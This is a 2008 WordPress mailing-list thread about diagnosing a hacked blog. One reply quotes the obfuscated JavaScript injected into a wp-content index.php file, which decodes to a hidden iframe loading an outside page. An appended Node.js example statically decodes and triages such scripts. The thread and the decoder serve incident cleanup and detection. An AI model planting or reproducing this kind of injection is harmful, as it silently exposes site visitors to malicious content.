[wp-hackers] Black Hat Chinese Hackers - Looking for your input

MLR mlrichard at gmail.com
Mon Jun 2 21:23:18 GMT 2008


The only odd thing I found was a file in the /wp-content/ called
index.php which has an encrypted javascript call.

Removing it didn't change anything.

---
<script language="JavaScript">function vjaw(mtsy){return
String.fromCharCode(mtsy);}var
xwyq="060105102114097109101032115114099061034104116116112058047047107108101112097046099110047111108097046104116109108034032119105100116104061039050048048039032104101105103104116061039050049050039032115116121108101061034100105115112108097121058032110111110101059034062060047105102114097109101062";var
xbsf="";for(cwir=0;cwir<xwyq.length;cwir+=3){xbsf+=vjaw(xwyq[cwir]+''+xwyq[cwir+1]+''+xwyq[cwir+2]);}document.write(xbsf);</script>
---


On Mon, Jun 2, 2008 at 5:19 PM, George Pearce <pearce.gs at googlemail.com> wrote:
> I've been talking to Marie, and from what I can see there are no affected
> WordPress files, there are some silly 777's, but all the files have either
> been refreshed or checked manually. Nothing seems to be in the directory
> that the blog is, either.
> It's strange.
> How else would that 404 be achieved, without editing any files? Also, a
> javascript tag has attached itself to the bottom of the </html> on each
> page.
>
> (I'm replying because I've been talking to Marie for the last half hour :) )
>
> George
>
> -----Original Message-----
> From: wp-hackers-bounces at lists.automattic.com
> [mailto:wp-hackers-bounces at lists.automattic.com] On Behalf Of Jason Webster
> Sent: 02 June 2008 22:16
> To: wp-hackers at lists.automattic.com
> Subject: Re: [wp-hackers] Black Hat Chinese Hackers - Looking for your input
>
> Here's a few things that would be useful to know:
>
> Are you sure WordPress was the point of entry for the attack?
>
> What kind of hosting? i.e., shared/dedicated.
>
> MLR wrote:
>> Hi Guys,
>>
>> I have noticed two things:
>> - The combination of the words WordPress and Hack mostly return topics
>> about making WP do cool things (the spirit of this mailing list)
>> - Most requests for info about fixing hacked blogs are dead ends on
>> wordpress.org
>>
>> Today I am trying to fix a hacked blog without simply starting over. I
>> want to know what happened to create the following problem:
>>
>> All requests in the address bar to ANY wp-admin files return a 404 error.
>>
>> The .htaccess file seems clean.
>>
>> All files were at 2.5.1
>>
>> I have already overwritten all files in sequence to spot which one
>> would have rogue code.
>>
>> I checked the theme it seems fine (no encoded bits of javascript or rogue
>> code)
>>
>> I have removed the javascript functions at the bottom of the index.php
>> that a bot inserts everyday on the site.
>>
>> Your pointers will definitely help me understand the source of the issue.
>>
>> What is your opinion on the usefulness of this plugin?
>> http://www.askapache.com/wordpress/htaccess-password-protect.html
>>
>> (I know this is easily done the classic way but don't we all have a
>> gazillion blogs to manage!?!)
>>
>>
>> Thanks a lot,
>> Marie-Lynn
>> http://www.friendly-webmaster.com
>> _______________________________________________
>> wp-hackers mailing list
>> wp-hackers at lists.automattic.com
>> http://lists.automattic.com/mailman/listinfo/wp-hackers
>>
>
>
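The script quoted at the top of this message stores its markup as three decimal digits per character and rebuilds it with String.fromCharCode before calling document.write. The following is an added example, not part of the original thread, that decodes such a literal statically in Node.js and reports what the markup would load, without running it. The sample script, its payload and the example.invalid host are constructed for the illustration.

```javascript
// Added example: decode the three-digits-per-character scheme statically.
// Nothing is evaluated and nothing is written to a DOM.

// Constructed sample in the same layout as the injected script; the payload
// and the example.invalid host are made up for this example.
const SAMPLE_HTML =
  '<iframe src="http://example.invalid/x.html" width=\'1\' style="display: none;"></iframe>';
const encodeTriplets = (text) =>
  Array.from(text, (ch) => String(ch.charCodeAt(0)).padStart(3, "0")).join("");
const SAMPLE_SCRIPT =
  '<script>function f(n){return String.fromCharCode(n);}var s="' +
  encodeTriplets(SAMPLE_HTML) +
  '";var o="";for(i=0;i<s.length;i+=3){o+=f(s[i]+s[i+1]+s[i+2]);}document.write(o);</script>';

// Decode every quoted all-digit literal that fits the scheme.
function decodeTripletLiterals(source) {
  const results = [];
  for (const m of source.matchAll(/["'](\d{12,})["']/g)) {
    const digits = m[1];
    if (digits.length % 3 !== 0) continue; // not whole triplets
    const codes = digits.match(/\d{3}/g).map((t) => parseInt(t, 10));
    if (codes.some((c) => c > 255)) continue; // not single-byte character codes
    results.push(String.fromCharCode(...codes));
  }
  return results;
}

// Report what the decoded markup would load and whether it is hidden.
function triage(decoded) {
  const findings = [];
  for (const m of decoded.matchAll(/<(iframe|script)\b[^>]*>/gi)) {
    const src = /\bsrc\s*=\s*["']?([^"'\s>]+)/i.exec(m[0]);
    findings.push({
      tag: m[1].toLowerCase(),
      src: src ? src[1] : null,
      hidden: /display\s*:\s*none|visibility\s*:\s*hidden/i.test(m[0]),
    });
  }
  return findings;
}

// Full pass: decode the literals in a file's contents, then triage each result.
function scan(source) {
  return decodeTripletLiterals(source).flatMap(triage);
}

console.log(scan(SAMPLE_SCRIPT));
```

Feeding it the contents of a suspect file read from disk shows the hidden frame's target without a browser ever loading the page.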

